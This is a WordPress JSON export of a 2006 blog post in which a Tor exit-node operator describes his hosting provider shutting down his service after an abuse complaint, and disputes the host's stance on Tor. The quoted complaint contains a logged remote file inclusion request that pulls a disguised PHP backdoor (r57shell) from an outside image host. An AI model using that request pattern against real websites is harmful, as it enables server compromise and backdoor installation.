{"id":110,"date":"2006-10-16T15:57:45","date_gmt":"2006-10-16T15:57:45","guid":{"rendered":"http:\/\/blog.bananasplit.info\/?p=110"},"modified":"2006-10-16T15:57:45","modified_gmt":"2006-10-16T15:57:45","slug":"last-rites","status":"publish","type":"post","link":"https:\/\/blog.stmellion.org\/?p=110","title":{"rendered":"Last Rites"},"content":{"rendered":"<p>Today has been a long time coming, but the inevitable happened in the end; <a href=\"www.layeredtech.com\">Layered Technologies<\/a> shut me down.<\/p>\n<p>It started off with just the usual abuse complaint.  This time it seems that someone used Tor to run code stored as a phony JPEG at freeimagehosting.net.  The complainant had already fixed their vulnerability by the time they contacted <a href=\"www.layeredtech.com\">Layered Technologies<\/a>, but I still got the usual immense email telling me how to fix an exploit I didn&#8217;t have.  I won&#8217;t post it all below as it&#8217;s ridiculous.  This is the guts:<\/p>\n<blockquote><p>\nTicket #AMU-37245-883<\/p>\n<p>From: abuse@layeredtech.com<br \/>\n  To: steve@bananasplit.info<\/p>\n<p>Subject: Policy Enforcement of SID6321 LTSV-1594-SCROOK at 72.21.33.202 for Hacking<\/p>\n<p>Thank you,<\/p>\n<p>Logan<br \/>\nLayered Technologies<br \/>\nAbuse Department<br \/>\nPolicy Enforcement Technician<\/p>\n<p>ACCEPTABLE USE POLICY at http:\/\/layeredtech.com\/aup.shtml<\/p>\n<p>Date: Sun, 15 Oct 2006 18:32:53 -0500<\/p>\n<p>A HACKER from LayeredTech is trying to exploit a hole in our client&#8217;s site code that we closed. 
The HACKING SCRIPTS are provided from FREEIMAGEHOSTING as phony JPGs.<\/p>\n<p>72.21.33.202 &#8211; &#8211; [15\/Oct\/2006:03:09:07 -0700] &#8220;GET \/index.php?pagename=http:\/\/img3.freeimagehosting.net\/uploads\/ba5cd3062d.jpg?<br \/>\nHTTP\/1.1&#8221; 200 18434<\/p>\n<p>HACKER:<br \/>\nName:    drooper.bananasplit.info<br \/>\nAddress:  72.21.33.202<\/p>\n<p>HACKING CODE:<br \/>\nName:    img3.freeimagehosting.net<br \/>\nAddress:  70.86.147.247\n<\/p><\/blockquote>\n<p>Looks pretty minor to me and I&#8217;ve had enough prior dealings with Logan at Layered Technologies to know that he&#8217;s one of the good guys.  Unfortunately by the time I responded, I didn&#8217;t get Logan, I got Terry.  Oh dear, this is the guy who claims to know all about <a href=\"tor.eff.org\">Tor<\/a> but still seems to think I can gaze into a crystal ball and preempt an attack on an insecure website.  Things went downhill from here; Terry insisted I shut down my Tor service:<\/p>\n<blockquote><p>\nto:  steve@bananasplit.info<\/p>\n<p>You must remove the TOR (anonymous proxy) software because it has been used to send a URL embedded with a command to cause a 3rd party server to download a php exploit which is actually r57shell.php (a backdoor shell).<\/p>\n<p>We do not allow TOR or Proxies on our network that are used for abuse.\n<\/p><\/blockquote>\n<p>This is the clincher that convinced me it was time to cancel my contract with <a href=\"www.layeredtech.com\">Layered Technologies<\/a>.  Terry knows damn well that there&#8217;s nothing I can do to stop a <a href=\"tor.eff.org\">Tor<\/a> exit-node from being used in this manner.  It seems <a href=\"www.layeredtech.com\">Layered Technologies<\/a> allow people to run <a href=\"tor.eff.org\">Tor<\/a> servers (sales pitch), but they do not allow Tor functionality.  What a rip-off.  
I replied:<\/p>\n<blockquote><p>\nTerry,<\/p>\n<p>I&#8217;ll comply and remove Tor, but please take this as notice that I won&#8217;t require your hosting beyond the end of this billing period.  Having been specifically advised by LayeredTech that I could host a Tor service, this is very disappointing news.  It seems your sales pitch is not in<br \/>\ntune with your operating practices.<\/p>\n<p>I&#8217;d also like to point out that I&#8217;ve purchased a number of upgrades to my server.  As LayeredTech are changing their policy with regard to Tor, am I entitled to any refund of these costs?<\/p>\n<p>Regards<br \/>\nSteve\n<\/p><\/blockquote>\n<p>I guess the bit about wanting a refund is a little tongue-in-cheek.  <a href=\"www.layeredtech.com\">Layered Technologies<\/a> will never admit that they erred in allowing a Tor service without really understanding what it was.  To claim that the service is acceptable but what it does is not is nothing more than a &#8220;We&#8217;ve got your money, now fuck off, you&#8217;re a nuisance&#8221;.  Terry&#8217;s response was:<\/p>\n<blockquote><p>\nWe have not changed our policies. You are responsible for all abuse occurring on, from, or through your assigned IP addresses. You are required to remove the cause of any abuse which occurs on, from, or through your assigned IP addresses. We allow proxies and TOR only to the extent that it is not used for abuse. Because TOR is completely anonymous using tunnels to hide communications and preventing traffic analysis to determine the source of an abuse through your server, you cannot identify, remove, or prevent the cause of the abuse. Therefore, the only way to protect our IP space and innocent 3rd party networks from further abuse is to require removal of the TOR. You should understand that your server has been used to attempt to cause the installation of backdoor hacking software onto 3rd party servers which would completely compromise the 3rd party server. 
This places our company at legal liability and this is justification for the removal of the software.\n<\/p><\/blockquote>\n<p>I wasted my time and replied to this, pointing out to Terry that <a href=\"www.layeredtech.com\">Layered Technologies<\/a> are not in any way legally accountable for a service that blindly routes traffic.  He already knows this as I&#8217;ve bashed my head against a brick wall telling him all that before.  I just got an automated response saying the abuse ticket was closed.<\/p>\n<p>So there it is, the end of my <a href=\"www.layeredtech.com\">Layered Technologies<\/a> experience.  Lots spent in setup and upgrade costs whilst all the time knowing that sooner or later they would pull the plug.  At least recording my experiences will make others think twice when opening a service at <a href=\"www.layeredtech.com\">Layered Technologies<\/a> that can potentially be abused.  In general, such services are probably going to be more trouble to them than the business is worth.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Today has been a long time coming, but the inevitable happened in the end; Layered Technologies shut me down. It started off with just the usual abuse complaint. This time it seems that someone used Tor to run code stored as a phony JPEG at freeimagehosting.net. 
The complainant had already fixed their vulnerability by the&hellip; <a class=\"more-link\" href=\"https:\/\/blog.stmellion.org\/?p=110\">Continue reading <span class=\"screen-reader-text\">Last Rites<\/span><\/a><\/p>\n","protected":false},"author":24,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10],"tags":[],"class_list":["post-110","post","type-post","status-publish","format-standard","hentry","category-layered-technologies","entry"],"_links":{"self":[{"href":"https:\/\/blog.stmellion.org\/index.php?rest_route=\/wp\/v2\/posts\/110","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.stmellion.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.stmellion.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.stmellion.org\/index.php?rest_route=\/wp\/v2\/users\/24"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.stmellion.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=110"}],"version-history":[{"count":0,"href":"https:\/\/blog.stmellion.org\/index.php?rest_route=\/wp\/v2\/posts\/110\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.stmellion.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=110"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.stmellion.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=110"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.stmellion.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=110"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}